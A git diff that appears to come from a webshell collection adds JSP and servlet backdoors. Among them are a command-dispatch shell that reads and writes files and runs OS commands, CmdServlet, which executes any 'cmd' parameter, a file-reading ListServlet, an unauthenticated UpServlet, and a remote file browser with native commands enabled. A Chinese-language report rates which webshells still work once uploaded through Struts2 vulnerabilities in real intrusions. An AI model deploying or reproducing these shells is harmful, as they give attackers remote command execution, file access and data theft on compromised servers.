if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); +while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} +else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); +bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} +else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} +else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} +else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); +MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} +else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} +}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); +%> \ No newline at end of file diff --git a/jsp/hackk8/Struts2下shell兼容性报告_K8.txt b/jsp/hackk8/Struts2下shell兼容性报告_K8.txt new file mode 100644 index 0000000..28a6646 --- /dev/null +++ b/jsp/hackk8/Struts2下shell兼容性报告_K8.txt @@ -0,0 +1,54 @@ + +struts2 环境下 jspshell 功能测试 2013.5.23 by 拉登哥哥 +看下这个报告 你们就知道 为啥s2上传的shell成功率低的原因了 +上传不成功或内容被过滤是另外的事 上传成功的shell没被过滤又不解析或报错 就是以下原因了 + +struts 2.2.1.1 默认环境下 以下报告是在这版本下的 别的版本未知 +好像默认环境没带有IO操作 还有 org.apache.jasper(S2文件上传组件) +自己找了无组件上传的jsp 也报废... + + +K8收集的(其实之前也在网上问人要来的一些 wooyun某群群主 还有其它成员) + +k8cmd.jsp 兼容性非常好 不管在s2 还是普通环境下都正常使用 +实战 支持Win/Linux 还有执行的命令通过飞刀加密发送 + +普通 cmd.jsp啥的 可以使用 不用说了 但是在linux下不行 + +other下面的大马 丢到struts2环境下 没一个能正常解析的 + +JspWebshell 1.2.jsp 能解析 但上传不了文件 好像是马写的有问题 + +JavaShell.jsp jsp-reverse.jsp 也不能解析 + +kbaidu8.jsp 兼容性8错 哥专用的 原版 jspspy 1.0 但是上传文件也是失败的 1.2版本的直接报废 + +Customize.jsp 菜刀的jsp马 本地s2环境 报错 连接上也可以操作 +实战 通过struts2的洞 上传过去的 功能就废了(linux下) win的还未测试 + +JSP无组件实现WEB上传.rar 也失效 + +一句话jsp那个 可以传过去 但是无法写出文件 + + +77收集的几个 Win下测试 + +browser.jsp 可以使用 但是文件上传功能报废 原因都是这个组件 org.apache.jasper + +还有是cmd相关的也可用 也只是win下的 + +其它都是直接报废。。。。。 + +法客工具包里的jsp +no.jsp 其实是那个什么jsfoloer改的 也是上传文件功能不行 别的功能未测 +silic webshell.jsp 和no.jsp in.jsp都是jsfoloer改的 + +JspSpyJDK5.jsp 报废 + +ma2.jsp 能解析 但上传文件那失败 java.io.IOException: 这就是IO了 +ma3.jsp 直接报废 因为使用的是jasper +ma1.jsp 和ma4.jsp job.jsp探针 能正常解析 +spjspshell.jsp 直接报废 同ma3.jsp 用的组件一样 + +总结: 普通单纯执行cmd一类的都能正常运行,探针也是 个别大马也勉强 jspspy 1.0兼容性 比较靠普 +在这些样本里90%都挂了 实战中 也许有些站加了上传组件啥的 可能部分上传脚本还是能用的 具体自测 diff --git a/jsp/hackk8/jsp2/CmdServlet.class b/jsp/hackk8/jsp2/CmdServlet.class new file mode 100644 index 0000000000000000000000000000000000000000..4afd7f10f720f1ff5916b02fdc2ec5fb1e0814fd GIT binary patch literal 1785 zcma)7-%}e^6#i}!vdglRvJfbxtsz<(C}G>GSYe6U6lfGFCb1RkuT63TTiG9OHVi!Y z7dYdCkG}ZQ8E1TIUxL^fAARtD@n2BS-6XJ#onmHk?(VtYx#yhke)sO5fB*J7fO&ka z;1%R#%nv}v4PkD|xTWBAydmRF84EJrl5tzc+XGm{k_1D+pa@tNV_wEPVtiM@d$=Q` zAjZ2ARursaO~DxM2~!m7y)WYf8S64Wl&~S;K10&594p8(#IrLG7!n1y&KZW*Er)Nk z>?-#wW_6c5eRX$@2Mnd``eSp?+}E4j-`nMZz7qtVeveGK<0$cOTD%!7oe67tuG8d8 zBCE2pU*le2kwe0!gpU}`ZS$bJV$o^145QhZa7lgFbhhX-qNn2Yg=?YVS%YsVJkO;$u)=)ez3SQFZGFc?l0ye1ZzYEn~;e8(!XM zxW1jXd9dTwmosZCl}y?(ZN8kb55!C+ZPrB1%b5)EcZG=bT0uHE@CYF?_RuxEE&!QR zfM%;|TLjrNcUy!nb0-8zhAx&C`$1t6wp4tIM+{@4ooMTKT8#$xi58_-Y&BnSZQFF} zi)j^~;d6#@#n7wN9W^8VVN*WOD=NOgtb{LBdzX+J6Qp>G9(_3@q< ziKb0bVt0b{cw9}yO{d2bAcm`FRTZ8c5+>!^G<_0Vm~Q$-CB5i0Bu&pFB{9tXuZWI_ zsA@TIJ12@^IHWT?WTlo9ST<3jP&vmhsb23<46Tvi`<&!+?TpNuzFXtXCIv(?b)B7K zAJN=trXv#+exaL)wjeqY-eROzB7v^7BGr{G%sjvpuFxebesM5yEs)L7+hrOVjeWC+ zV9)4*;Z?H9&^buF}5|4Xk+{k7Z&^C z3&{z}KC!isjQxbcTq^lP8yA26=dYYL8J2K~>`7az7^Vi!LxzSSj39+kOp=|V55zT$ zBZmpx#zj0L@3**w?}(r8iMbz%yC+1*OQa{slW~#M}S? literal 0 HcmV?d00001 diff --git a/jsp/hackk8/jsp2/CmdServlet.java b/jsp/hackk8/jsp2/CmdServlet.java new file mode 100644 index 0000000..f9cb31a --- /dev/null +++ b/jsp/hackk8/jsp2/CmdServlet.java @@ -0,0 +1,43 @@ +/* + * CmdServlet.java 20/01/2004 + * + * @author The Dark Raver + * @version 0.1 + */ + +import java.io.*; +import javax.servlet.*; +import javax.servlet.http.*; + + +public class CmdServlet extends HttpServlet { + + public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { + res.setContentType("text/html"); + + PrintWriter out = res.getWriter(); + out.print(""); + out.print("

    "); + out.print(""); + out.print(""); + out.print("
    "); + + if(req.getParameter("cmd") != null) { + out.print("\n

    Command: " + req.getParameter("cmd") + "\n

    \n");
+	        Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
+	        DataInputStream procIn = new DataInputStream(p.getInputStream());
+			int c='\0';
+        	while ((c=procIn.read()) != -1) {
+				out.print((char)c);
+				}
+	        }
+
+		out.print("\n
    "); + out.print(""); + } + + public String getServletInfo() { + return "CmdServlet 0.1"; + } + +} diff --git a/jsp/hackk8/jsp2/ListServlet.class b/jsp/hackk8/jsp2/ListServlet.class new file mode 100644 index 0000000000000000000000000000000000000000..b81617901454b92ea3e98197f49a2611ed045ec4 GIT binary patch literal 2377 zcmai0+fy4=82=q^d$MdVY@wK9+bxw6T0-oNwqXep?nnVcXr--}B^+SekkHKnrQU6; z*1OfJ*f(b^KIn|jI53s556(Ews1LsTjcLnhbKG)bJ|v2>Sk8DfFHv(~J2A(Ro$Y*M(PN!OhYbrTuNGGgNVjL5i6_f*SF zr&AfxB(16)7ZPIHwTYqNDFsh6Y@85o4zVXSo@OWy)OnDhq?MWo4Y`h;nrNb{L+KeO zAv$g8|GjB*VvSNm^0@V!V6r%&}BN0`>B@LHxh2fytInW12rNj7U5*fRfwfQ^F)^m$O;6-# zc+1<&F>I+b%vNK_ollD9S}*#rL9NwPYjnrNcyn!wtVT0KK`pgku^DQOkeCOIA^V~T z8yeomJ2KpB3>%Emc~@kNIvFly&hMorB$F<)Age*Ok+o!~%n!ULH9g}}uLx^O=HOio z@8P;E+WQ(lz%lZ%%}Uj}Mod^^hIB_7U?^MH0}Q2ky~VIYTKVrGSf`L{<+VO1%d39& z4CHb5{6B6?WT%F~NAq#gv0d3Im8+vcFnH7HSEkmy$C zq%7z7D!BJ_QkM}Vy`w!eFM%G(D^4WS8G&7Bq+bsCR|qDbB%)zDZKsvdTD*4|>`U4( zG!ZTFm>N+N%_xwn1(#6-jTC;Wzl8#Z{(XAkEfkTgD5w`Np(Lm)L|3`rL(w^jR^S_1 zhN_n?LGu?8(KirT!bZ|v!KM*^(K0rNi~WR9w!n_9Kp)Y!ETcS3QrcF?tssQWz=o_W72EpN+O4yzt?mAqHFh=aLH z_b;F_sBiZ!k>wpZad}YRxymyS@;l zKjNsu8RAS}2OR9gJPdlos&O5=aRW8DiCTPy0KO%hpRo_WAc$Y-KbGIIAAjHg_1Ga+ zio>iNN7yzTWi|BnHK2(dg2^tyU{}$?uA!BEgf{jG+S#Y*V4tIleT8oJ4SLykIL>~= oAR=CO7N7+WQFpc?N>ny-6|J(73-!Za(30QAaXPgTuK?|T1OIR|FaQ7m literal 0 HcmV?d00001 diff --git a/jsp/hackk8/jsp2/ListServlet.java b/jsp/hackk8/jsp2/ListServlet.java new file mode 100644 index 0000000..1d97304 --- /dev/null +++ b/jsp/hackk8/jsp2/ListServlet.java @@ -0,0 +1,86 @@ +/* + * ListServlet.java + * + * @author Sierra + * @version 0.1 + */ + +import java.io.*; +import javax.servlet.ServletException; +import javax.servlet.http.*; + +public class ListServlet extends HttpServlet +{ + + + public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { + PrintWriter printwriter = res.getWriter(); + String path = req.getParameter("file"); + + printwriter.write("\n\nDirectory Listing\n\n\n"); + printwriter.write("\n"); + if(req.getParameter("file")==null) path = "c:\\"; + printwriter.write("

    Path: " + path + "

    \n");
+
+		File file = new File(path);
+
+		if(file.isDirectory())
+		{
+			String s = new String("Unknown");
+			String s2 = new String("Black");
+			File afile[] = file.listFiles();
+			for(int i = 0; i < afile.length; i++)
+			{
+				String s1 = new String(afile[i].toString());
+				printwriter.write("(");
+				String s3;
+				if(afile[i].isDirectory())
+				{
+					printwriter.write("d");
+					s1 = s1 + "/";
+					s3 = new String("Blue");
+				} else
+				if(afile[i].isFile())
+				{
+					printwriter.write("-");
+					s3 = new String("Green");
+				} else
+				{
+					printwriter.write("?");
+					s3 = new String("Red");
+				}
+				if(afile[i].canRead())
+					printwriter.write("r");
+				else
+					printwriter.write("-");
+				if(afile[i].canWrite())
+					printwriter.write("w");
+				else
+					printwriter.write("-");
+				printwriter.write(") " + s1.toString() + " " + "( Size: " + afile[i].length() + " bytes )
    \n");
+			}
+
+			printwriter.write("
    ");
+		} else
+		if(file.canRead())
+		{
+			FileInputStream fileinputstream = new FileInputStream(file);
+			int j = 0;
+				while(j >= 0)
+				{
+					j = fileinputstream.read();
+					printwriter.write(j);
+				}
+			fileinputstream.close();
+		} else
+		{
+			printwriter.write("Can't Read file
    ");
+		}
+
+    }
+
+
+    public String getServletInfo() {
+        return "Directory Listing";
+    }
+}
\ No newline at end of file
diff --git a/jsp/hackk8/jsp2/UpServlet.class b/jsp/hackk8/jsp2/UpServlet.class
new file mode 100644
index 0000000000000000000000000000000000000000..fef990ed2b0c25277e6b5ac5cec37a7e47872ea8
GIT binary patch
literal 2072
zcma)7OH&(15dH=|b|oz!1OjA?EelKl0|Gx3TSy8v_(4p7@N!6;#EUe*lGUy(jWEuc
zUyx%iRJkgZt8;-ORORlRa`efU+?@ZAq-Q0BFi9L8dR{%<-+uk|=+{4g{sq7Yp83&-
z8!8e3e2AOU+)|PBV;m_JX%!h2AE}s7aa+M1KQ!D3U=mXb?)uS;dn)eB@qvPAKU!s=
zkLCDKni*+6k#}Yl%&D07;~YL!u;52G7G;E7Ckt@tKNM1)nSUg29_IEJI`%
zT>S$p4DLxg#~GSu42#c}^J~1gq_3H@|_Hn^yUp0?I)hPM6z
zCwAP_t&RAiC>qwrIK^1B%f&3eXGpY7%g1m=Bw7t0pr64f_>KgeHx+!P;cGn6pks|e
zOUcblYR%3)&nU=h$l(dYL~5;=Nv+$(d^FF+rkzX2=I0idVo^OSv8H3OD7UiWd4Z>6
z`LZdDf?gDH=|7y)g&reTN0;Yk=59|#iRD6BL@U1QgfSMi^gP|G%uB|%G*67mE4`2CqoODxCP9~Z)rQ#0ol=Eq{5tQFtPmcnwVI3O`9nO(q$EOJ3
zw8TUNay>5@+N3I{3PqmLU|@@({oOEk%IoXA$Uu7f2BtK0&%#v=HVVYzaqMahvdPDW
zRT8>sj+pj_%s`xW);rCW#VG_&H59R>p(Kq!S;Mxhn>UqCN9P_gG}g)*9UU2?g4Wgy
z7i8dnm*p9Us-|knV`x2wHa%Cj+xOpb7kEX-RE824leQ(eC6-7M4B<+v)EB~0yN?w8
zsAvdDWyi6YsU-8HewNq8tmA<9~S=-9$^u>Mu
zD*=UWIe{*P=wJ>K<<;8EaBD-5)V*eP;&~=(K~G=*w0w&^S<^0YT*75~v*phXCZ7+o
z1GMUc^*6VCGlD&cd5cixSZ-qz#&J%gv2;c&maFHmB5_vHyQ4hw@i");
+		out.print("
    ");
+		out.print("UPLOAD ");
+		out.print("");
+		out.print("
    ");
+		out.print("");
+	}
+
+
+    public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
+		String tag = new String();
+		int c = '\0';
+		int contador = 0;
+		ServletInputStream in = req.getInputStream();
+        DataInputStream post = new DataInputStream(in);
+
+		PrintWriter out = res.getWriter();
+		res.setContentType("text/html");
+		out.print("
    ");
+
+		while((c=post.read()) != -1 && c != '\r' && c != '\n') {
+			tag=tag.concat("" + (char)c);
+			contador++;
+			}
+
+		for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
+
+		// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
+		// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
+
+		// (!) Uploaded File Name
+
+		File newfile = new File("c:\\install.log");
+
+		/////////////////////////
+
+		FileOutputStream fileout = new FileOutputStream(newfile);
+
+		for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
+			c=post.read();
+			fileout.write((char)c);
+			}
+
+		fileout.close();
+		out.print("<== OK");
+
+    }
+
+
+    public String getServletInfo() {
+		return "UpServlet 0.1";
+    }
+
+}
\ No newline at end of file
diff --git a/jsp/hackk8/jsp2/browser.jsp b/jsp/hackk8/jsp2/browser.jsp
new file mode 100644
index 0000000..7d85dc8
--- /dev/null
+++ b/jsp/hackk8/jsp2/browser.jsp
@@ -0,0 +1,1802 @@
+<%--
+	jsp File browser 1.1a
+	Copyright (C) 2003,2004, Boris von Loesch
+	This program is free software; you can redistribute it and/or modify it under
+	the terms of the GNU General Public License as published by the
+	Free Software Foundation; either version 2 of the License, or (at your option)
+	any later version.
+	This program is distributed in the hope that it will be useful, but
+	WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
+	FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
+	You should have received a copy of the GNU General Public License along with
+	this program; if not, write to the
+	Free Software Foundation, Inc.,
+	59 Temple Place, Suite 330,
+	Boston, MA 02111-1307 USA
+	- Description: jsp File browser v1.1a -- This JSP program allows remote web-based
+				file access and manipulation.  You can copy, create, move and delete files.
+				Text files can be edited and groups of files and folders can be downloaded
+				as a single zip file that's created on the fly.
+	- Credits: Taylor Bastien, David Levine, David Cowan, Lieven Govaerts
+--%>
+<%@page import="java.util.*,
+                java.net.*,
+                java.text.*,
+                java.util.zip.*,
+                java.io.*"
+%>
+<%!
+    //FEATURES
+    private static final boolean NATIVE_COMMANDS = true;
+
+    //Allow browsing and file manipulation only in certain directories
+	private static final boolean RESTRICT_BROWSING = false;
+    //If true, the user is allowed to browse only in RESTRICT_PATH,
+    //if false, the user is allowed to browse all directories besides RESTRICT_PATH
+    private static final boolean RESTRICT_WHITELIST = false;
+    //Paths, sperated by semicolon
+    //private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!!
+	private static final String RESTRICT_PATH = "/etc;/var";
+
+    //The refresh time in seconds of the upload monitor window
+	private static final int UPLOAD_MONITOR_REFRESH = 2;
+	//The number of colums for the edit field
+	private static final int EDITFIELD_COLS = 85;
+	//The number of rows for the edit field
+	private static final int EDITFIELD_ROWS = 30;
+	//Open a new window to view a file
+	private static final boolean USE_POPUP = true;
+	/**
+	 * If USE_DIR_PREVIEW = true, then for every directory a tooltip will be
+	 * created (hold the mouse over the link) with the first DIR_PREVIEW_NUMBER entries.
+	 * This can yield to performance issues. Turn it of, if the directory loads to slow.
+	 */
+	private static final boolean USE_DIR_PREVIEW = true;
+	private static final int DIR_PREVIEW_NUMBER = 10;
+	/**
+	 * The name of an optional CSS Stylesheet file
+	 */
+	private static final String CSS_NAME = "Browser.css";
+	/**
+	 * The compression level for zip file creation (0-9)
+	 * 0 = No compression
+	 * 1 = Standard compression (Very fast)
+	 * ...
+	 * 9 = Best compression (Very slow)
+	 */
+	private static final int COMPRESSION_LEVEL = 1;
+	/**
+	 * The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the
+	 * server runs on a windows platform, to avoid a message box, if you try to access
+	 * an empty removable drive (See KNOWN BUGS in Readme.txt).
+	 */
+	private static final String[] FORBIDDEN_DRIVES = {"a:\\"};
+
+	/**
+	 * Command of the shell interpreter and the parameter to run a programm
+	 */
+	private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows
+	//private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; 	// Unix
+
+	/**
+	 * Max time in ms a process is allowed to run, before it will be terminated
+	 */
+	private static final long MAX_PROCESS_RUNNING_TIME = 30 * 1000; //30 seconds
+
+	//Button names
+	private static final String SAVE_AS_ZIP = "Download selected files as zip";
+	private static final String RENAME_FILE = "Rename File";
+	private static final String DELETE_FILES = "Delete selected files";
+	private static final String CREATE_DIR = "Create Dir";
+	private static final String CREATE_FILE = "Create File";
+	private static final String MOVE_FILES = "Move Files";
+	private static final String COPY_FILES = "Copy Files";
+
+	//Normally you should not change anything after this line
+	//----------------------------------------------------------------------------------
+	//Change this to locate the tempfile directory for upload (not longer needed)
+	private static String tempdir = ".";
+	private static String VERSION_NR = "1.1a";
+	private static DateFormat dateFormat = DateFormat.getDateTimeInstance();
+
+	public class UplInfo {
+
+		public long totalSize;
+		public long currSize;
+		public long starttime;
+		public boolean aborted;
+
+		public UplInfo() {
+			totalSize = 0l;
+			currSize = 0l;
+			starttime = System.currentTimeMillis();
+			aborted = false;
+		}
+
+		public UplInfo(int size) {
+			totalSize = size;
+			currSize = 0;
+			starttime = System.currentTimeMillis();
+			aborted = false;
+		}
+
+		public String getUprate() {
+			long time = System.currentTimeMillis() - starttime;
+			if (time != 0) {
+				long uprate = currSize * 1000 / time;
+				return convertFileSize(uprate) + "/s";
+			}
+			else return "n/a";
+		}
+
+		public int getPercent() {
+			if (totalSize == 0) return 0;
+			else return (int) (currSize * 100 / totalSize);
+		}
+
+		public String getTimeElapsed() {
+			long time = (System.currentTimeMillis() - starttime) / 1000l;
+			if (time - 60l >= 0){
+				if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
+				else return time / 60 + ":0" + (time % 60) + "m";
+			}
+			else return time<10 ? "0" + time + "s": time + "s";
+		}
+
+		public String getTimeEstimated() {
+			if (currSize == 0) return "n/a";
+			long time = System.currentTimeMillis() - starttime;
+			time = totalSize * time / currSize;
+			time /= 1000l;
+			if (time - 60l >= 0){
+				if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
+				else return time / 60 + ":0" + (time % 60) + "m";
+			}
+			else return time<10 ? "0" + time + "s": time + "s";
+		}
+
+	}
+
+	public class FileInfo {
+
+		public String name = null, clientFileName = null, fileContentType = null;
+		private byte[] fileContents = null;
+		public File file = null;
+		public StringBuffer sb = new StringBuffer(100);
+
+		public void setFileContents(byte[] aByteArray) {
+			fileContents = new byte[aByteArray.length];
+			System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
+		}
+	}
+
+	public static class UploadMonitor {
+
+		static Hashtable uploadTable = new Hashtable();
+
+		static void set(String fName, UplInfo info) {
+			uploadTable.put(fName, info);
+		}
+
+		static void remove(String fName) {
+			uploadTable.remove(fName);
+		}
+
+		static UplInfo getInfo(String fName) {
+			UplInfo info = (UplInfo) uploadTable.get(fName);
+			return info;
+		}
+	}
+
+	// A Class with methods used to process a ServletInputStream
+	public class HttpMultiPartParser {
+
+		private final String lineSeparator = System.getProperty("line.separator", "\n");
+		private final int ONE_MB = 1024 * 1;
+
+		public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
+				int clength) throws IllegalArgumentException, IOException {
+			if (is == null) throw new IllegalArgumentException("InputStream");
+			if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
+					"\"" + boundary + "\" is an illegal boundary indicator");
+			boundary = "--" + boundary;
+			StringTokenizer stLine = null, stFields = null;
+			FileInfo fileInfo = null;
+			Hashtable dataTable = new Hashtable(5);
+			String line = null, field = null, paramName = null;
+			boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
+			boolean isFile = false;
+			if (saveFiles) { // Create the required directory (including parent dirs)
+				File f = new File(saveInDir);
+				f.mkdirs();
+			}
+			line = getLine(is);
+			if (line == null || !line.startsWith(boundary)) throw new IOException(
+					"Boundary not found; boundary = " + boundary + ", line = " + line);
+			while (line != null) {
+				if (line == null || !line.startsWith(boundary)) return dataTable;
+				line = getLine(is);
+				if (line == null) return dataTable;
+				stLine = new StringTokenizer(line, ";\r\n");
+				if (stLine.countTokens() < 2) throw new IllegalArgumentException(
+						"Bad data in second line");
+				line = stLine.nextToken().toLowerCase();
+				if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
+						"Bad data in second line");
+				stFields = new StringTokenizer(stLine.nextToken(), "=\"");
+				if (stFields.countTokens() < 2) throw new IllegalArgumentException(
+						"Bad data in second line");
+				fileInfo = new FileInfo();
+				stFields.nextToken();
+				paramName = stFields.nextToken();
+				isFile = false;
+				if (stLine.hasMoreTokens()) {
+					field = stLine.nextToken();
+					stFields = new StringTokenizer(field, "=\"");
+					if (stFields.countTokens() > 1) {
+						if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
+							fileInfo.name = paramName;
+							String value = stFields.nextToken();
+							if (value != null && value.trim().length() > 0) {
+								fileInfo.clientFileName = value;
+								isFile = true;
+							}
+							else {
+								line = getLine(is); // Skip "Content-Type:" line
+								line = getLine(is); // Skip blank line
+								line = getLine(is); // Skip blank line
+								line = getLine(is); // Position to boundary line
+								continue;
+							}
+						}
+					}
+					else if (field.toLowerCase().indexOf("filename") >= 0) {
+						line = getLine(is); // Skip "Content-Type:" line
+						line = getLine(is); // Skip blank line
+						line = getLine(is); // Skip blank line
+						line = getLine(is); // Position to boundary line
+						continue;
+					}
+				}
+				boolean skipBlankLine = true;
+				if (isFile) {
+					line = getLine(is);
+					if (line == null) return dataTable;
+					if (line.trim().length() < 1) skipBlankLine = false;
+					else {
+						stLine = new StringTokenizer(line, ": ");
+						if (stLine.countTokens() < 2) throw new IllegalArgumentException(
+								"Bad data in third line");
+						stLine.nextToken(); // Content-Type
+						fileInfo.fileContentType = stLine.nextToken();
+					}
+				}
+				if (skipBlankLine) {
+					line = getLine(is);
+					if (line == null) return dataTable;
+				}
+				if (!isFile) {
+					line = getLine(is);
+					if (line == null) return dataTable;
+					dataTable.put(paramName, line);
+					// If parameter is dir, change saveInDir to dir
+					if (paramName.equals("dir")) saveInDir = line;
+					line = getLine(is);
+					continue;
+				}
+				try {
+					UplInfo uplInfo = new UplInfo(clength);
+					UploadMonitor.set(fileInfo.clientFileName, uplInfo);
+					OutputStream os = null;
+					String path = null;
+					if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
+							fileInfo.clientFileName));
+					else os = new ByteArrayOutputStream(ONE_MB);
+					boolean readingContent = true;
+					byte previousLine[] = new byte[2 * ONE_MB];
+					byte temp[] = null;
+					byte currentLine[] = new byte[2 * ONE_MB];
+					int read, read3;
+					if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
+						line = null;
+						break;
+					}
+					while (readingContent) {
+						if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
+							line = null;
+							uplInfo.aborted = true;
+							break;
+						}
+						if (compareBoundary(boundary, currentLine)) {
+							os.write(previousLine, 0, read - 2);
+							line = new String(currentLine, 0, read3);
+							break;
+						}
+						else {
+							os.write(previousLine, 0, read);
+							uplInfo.currSize += read;
+							temp = currentLine;
+							currentLine = previousLine;
+							previousLine = temp;
+							read = read3;
+						}//end else
+					}//end while
+					os.flush();
+					os.close();
+					if (!saveFiles) {
+						ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
+						fileInfo.setFileContents(baos.toByteArray());
+					}
+					else fileInfo.file = new File(path);
+					dataTable.put(paramName, fileInfo);
+					uplInfo.currSize = uplInfo.totalSize;
+				}//end try
+				catch (IOException e) {
+					throw e;
+				}
+			}
+			return dataTable;
+		}
+
+		/**
+		 * Compares boundary string to byte array
+		 */
+		private boolean compareBoundary(String boundary, byte ba[]) {
+			byte b;
+			if (boundary == null || ba == null) return false;
+			for (int i = 0; i < boundary.length(); i++)
+				if ((byte) boundary.charAt(i) != ba[i]) return false;
+			return true;
+		}
+
+		/** Convenience method to read HTTP header lines */
+		private synchronized String getLine(ServletInputStream sis) throws IOException {
+			byte b[] = new byte[1024];
+			int read = sis.readLine(b, 0, b.length), index;
+			String line = null;
+			if (read != -1) {
+				line = new String(b, 0, read);
+				if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
+			}
+			return line;
+		}
+
+		public String getFileName(String dir, String fileName) throws IllegalArgumentException {
+			String path = null;
+			if (dir == null || fileName == null) throw new IllegalArgumentException(
+					"dir or fileName is null");
+			int index = fileName.lastIndexOf('/');
+			String name = null;
+			if (index >= 0) name = fileName.substring(index + 1);
+			else name = fileName;
+			index = name.lastIndexOf('\\');
+			if (index >= 0) fileName = name.substring(index + 1);
+			path = dir + File.separator + fileName;
+			if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
+			else return path.replace('/', File.separatorChar);
+		}
+	} //End of class HttpMultiPartParser
+
+	/**
+	 * This class is a comparator to sort the filenames and dirs
+	 */
+	class FileComp implements Comparator {
+
+		int mode;
+		int sign;
+
+		FileComp() {
+			this.mode = 1;
+			this.sign = 1;
+		}
+
+		/**
+		 * @param mode sort by 1=Filename, 2=Size, 3=Date, 4=Type
+		 * The default sorting method is by Name
+		 * Negative mode means descending sort
+		 */
+		FileComp(int mode) {
+			if (mode < 0) {
+				this.mode = -mode;
+				sign = -1;
+			}
+			else {
+				this.mode = mode;
+				this.sign = 1;
+			}
+		}
+
+		public int compare(Object o1, Object o2) {
+			File f1 = (File) o1;
+			File f2 = (File) o2;
+			if (f1.isDirectory()) {
+				if (f2.isDirectory()) {
+					switch (mode) {
+					//Filename or Type
+					case 1:
+					case 4:
+						return sign
+								* f1.getAbsolutePath().toUpperCase().compareTo(
+										f2.getAbsolutePath().toUpperCase());
+					//Filesize
+					case 2:
+						return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
+					//Date
+					case 3:
+						return sign
+								* (new Long(f1.lastModified())
+										.compareTo(new Long(f2.lastModified())));
+					default:
+						return 1;
+					}
+				}
+				else return -1;
+			}
+			else if (f2.isDirectory()) return 1;
+			else {
+				switch (mode) {
+				case 1:
+					return sign
+							* f1.getAbsolutePath().toUpperCase().compareTo(
+									f2.getAbsolutePath().toUpperCase());
+				case 2:
+					return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
+				case 3:
+					return sign
+							* (new Long(f1.lastModified()).compareTo(new Long(f2.lastModified())));
+				case 4: { // Sort by extension
+					int tempIndexf1 = f1.getAbsolutePath().lastIndexOf('.');
+					int tempIndexf2 = f2.getAbsolutePath().lastIndexOf('.');
+					if ((tempIndexf1 == -1) && (tempIndexf2 == -1)) { // Neither have an extension
+						return sign
+								* f1.getAbsolutePath().toUpperCase().compareTo(
+										f2.getAbsolutePath().toUpperCase());
+					}
+					// f1 has no extension
+					else if (tempIndexf1 == -1) return -sign;
+					// f2 has no extension
+					else if (tempIndexf2 == -1) return sign;
+					// Both have an extension
+					else {
+						String tempEndf1 = f1.getAbsolutePath().toUpperCase()
+								.substring(tempIndexf1);
+						String tempEndf2 = f2.getAbsolutePath().toUpperCase()
+								.substring(tempIndexf2);
+						return sign * tempEndf1.compareTo(tempEndf2);
+					}
+				}
+				default:
+					return 1;
+				}
+			}
+		}
+	}
+
+	/**
+	 * Wrapperclass to wrap an OutputStream around a Writer
+	 */
+	class Writer2Stream extends OutputStream {
+
+		Writer out;
+
+		Writer2Stream(Writer w) {
+			super();
+			out = w;
+		}
+
+		public void write(int i) throws IOException {
+			out.write(i);
+		}
+
+		public void write(byte[] b) throws IOException {
+			for (int i = 0; i < b.length; i++) {
+				int n = b[i];
+				//Convert byte to ubyte
+				n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
+				out.write(n);
+			}
+		}
+
+		public void write(byte[] b, int off, int len) throws IOException {
+			for (int i = off; i < off + len; i++) {
+				int n = b[i];
+				n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
+				out.write(n);
+			}
+		}
+	} //End of class Writer2Stream
+
+	static Vector expandFileList(String[] files, boolean inclDirs) {
+		Vector v = new Vector();
+		if (files == null) return v;
+		for (int i = 0; i < files.length; i++)
+			v.add(new File(URLDecoder.decode(files[i])));
+		for (int i = 0; i < v.size(); i++) {
